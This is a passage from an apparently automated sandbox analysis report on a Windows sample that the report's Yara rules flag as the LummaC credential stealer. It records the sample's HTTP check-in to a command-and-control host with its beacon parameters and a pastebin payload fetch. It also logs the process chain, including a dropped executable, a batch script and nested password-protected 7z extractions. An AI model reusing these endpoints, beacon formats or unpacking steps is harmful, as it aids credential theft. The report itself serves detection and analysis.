                                                                                                                                                                                Data Ascii: 5"7d>,KZZ']WY2\?!\=K7E<@E=pb|A8(u[OD(UQAD"TF`04(<XOPpIjKl[#hzSq(oKC!tD?PUEEVQ6BvL)_Z={c
                                                                                                                                                                                2024-11-10 08:18:21 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:21 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=pehr10h93du5p5ptpvvji7jfns; expires=Thu, 06-Mar-2025 02:04:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsILZgq1SIV8xw9JDlFoZLttcxiI5avF4cpXpThRtcmUVvYcBOjML6IioyURyIx4DGZZtxmEvnaShf0Z08i%2F7Mk0oDUVVNqlG4GIqe%2BTGgmhlXTgLCPKwAbxqQ8bgFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c748b8b6c69-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=225&recv=628&lost=0&retrans=0&sent_bytes=2828&recv_bytes=587627&delivery_rate=2387469&cwnd=251&unsent_bytes=0&cid=14197b4a753138d3&ts=2340&x=0"


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                7192.168.2.949824104.21.39.34437908C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:21 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 89
                                                                                                                                                                                Host: pragapin.sbs
                                                                                                                                                                                2024-11-10 08:18:21 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 53 74 61 79 41 77 61 79 37 37 37 26 6a 3d 26 68 77 69 64 3d 32 45 46 32 45 39 30 31 42 41 31 45 41 34 31 39 34 39 31 33 35 43 44 30 42 33 31 45 30 45 32 33
                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@StayAway777&j=&hwid=2EF2E901BA1EA41949135CD0B31E0E23
                                                                                                                                                                                2024-11-10 08:18:22 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:22 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=78p5cmi51cioet8pepj2v03hj2; expires=Thu, 06-Mar-2025 02:05:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAcWTo5sQnbD6o32YEhfr0zkrDiHbHoe1a9BWLxrN9ig43PIxsxM9CNAmX1zZnY22kFqM1xz%2FWSyP3TluyQop5MHNUDAqI%2BOiAmnC8v%2FZrqa3X%2BcdwuaYbAXWhAUfFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049c871d376c33-DFW
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1893&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=985&delivery_rate=1513061&cwnd=251&unsent_bytes=0&cid=31a0fb8e09ee6898&ts=490&x=0"
                                                                                                                                                                                2024-11-10 08:18:22 UTC126INData Raw: 37 38 0d 0a 54 4b 57 75 70 75 2b 33 32 73 30 69 70 30 63 39 35 36 30 55 50 39 65 58 48 70 31 32 2f 4f 70 76 4b 30 4f 5a 4a 56 36 73 4c 43 59 58 33 6f 7a 54 7a 59 33 34 70 56 62 54 4e 77 65 37 67 6b 67 51 35 71 4d 70 73 30 4c 4a 78 46 73 63 62 61 45 55 41 6f 4e 50 53 53 4c 4e 77 64 57 62 6d 62 2b 31 52 34 56 72 48 34 48 5a 4e 67 58 6e 75 7a 7a 34 56 4d 62 61 45 6e 59 3d 0d 0a
                                                                                                                                                                                Data Ascii: 78TKWupu+32s0ip0c9560UP9eXHp12/OpvK0OZJV6sLCYX3ozTzY34pVbTNwe7gkgQ5qMps0LJxFscbaEUAoNPSSLNwdWbmb+1R4VrH4HZNgXnuzz4VMbaEnY=
                                                                                                                                                                                2024-11-10 08:18:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                8192.168.2.949927172.67.19.244437988C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-10 08:18:39 UTC74OUTGET /raw/dq3hWX27 HTTP/1.1
                                                                                                                                                                                Host: pastebin.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-10 08:18:39 UTC229INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Date: Sun, 10 Nov 2024 08:18:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8e049cf74bf7e5fa-DFW
                                                                                                                                                                                2024-11-10 08:18:39 UTC1140INData Raw: 31 31 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                Data Ascii: 115d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                2024-11-10 08:18:39 UTC1369INData Raw: 72 69 70 74 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d
                                                                                                                                                                                Data Ascii: ript>...<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-
                                                                                                                                                                                2024-11-10 08:18:39 UTC1369INData Raw: 38 52 4c 68 34 38 2e 45 45 55 2d 31 37 33 31 32 32 36 37 31 39 2d 30 2e 30 2e 31 2e 31 2d 2f 72 61 77 2f 64 71 33 68 57 58 32 37 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20
                                                                                                                                                                                Data Ascii: 8RLh48.EEU-1731226719-0.0.1.1-/raw/dq3hWX27"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form>
                                                                                                                                                                                2024-11-10 08:18:39 UTC575INData Raw: 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22
                                                                                                                                                                                Data Ascii: > <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("
                                                                                                                                                                                2024-11-10 08:18:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:03:18:03
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\PqSIlYOaIF.exe"
                                                                                                                                                                                Imagebase:0x50000
                                                                                                                                                                                File size:1'250'816 bytes
                                                                                                                                                                                MD5 hash:40AFDFD06DA2CBFAB2CFB3444B60174C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:1
                                                                                                                                                                                Start time:03:18:04
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:3
                                                                                                                                                                                Start time:03:18:06
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\PqSIlYOaIF.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\PqSIlYOaIF.exe"
                                                                                                                                                                                Imagebase:0x50000
                                                                                                                                                                                File size:1'250'816 bytes
                                                                                                                                                                                MD5 hash:40AFDFD06DA2CBFAB2CFB3444B60174C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1422795578.0000000003018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1406718329.000000000301E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1406688611.0000000003016000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:03:18:07
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 136
                                                                                                                                                                                Imagebase:0x20000
                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:03:18:28
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe"
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:3'125'704 bytes
                                                                                                                                                                                MD5 hash:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 79%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:03:18:31
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                Imagebase:0x7ff794f20000
                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:11
                                                                                                                                                                                Start time:03:18:31
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:03:18:31
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\mode.com
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:mode 65,10
                                                                                                                                                                                Imagebase:0x7ff6096c0000
                                                                                                                                                                                File size:33'280 bytes
                                                                                                                                                                                MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:03:18:31
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:14
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:17
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:19
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:03:18:32
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:22
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:23
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:24
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:7z.exe e extracted/file_1.zip -oextracted
